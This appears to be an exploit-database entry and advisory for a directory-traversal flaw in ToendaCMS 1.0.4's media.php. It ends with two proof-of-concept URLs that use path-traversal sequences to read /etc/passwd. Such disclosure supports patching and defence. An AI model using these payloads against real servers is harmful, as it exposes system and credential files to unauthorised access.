ToendaCMS 1.0.4 - 'Media.php' Directory Traversal
Author: MoHaJaLi
type: webapps
platform: php
port:
date_added: 2006-09-24
date_updated: 2013-10-01
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/20170/info
toendaCMS is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue may allow an attacker to access sensitive information that could aid in further attacks.
Version 1.0.4 is vulnerable; other versions may also be affected.
http://www.example.com/media.php?album=1005bb&key=../../../../../../../../../../../../../etc/passwd
http://www.example.com/media.php?album=../../../../../../../../../../../../..&key=/etc/passwd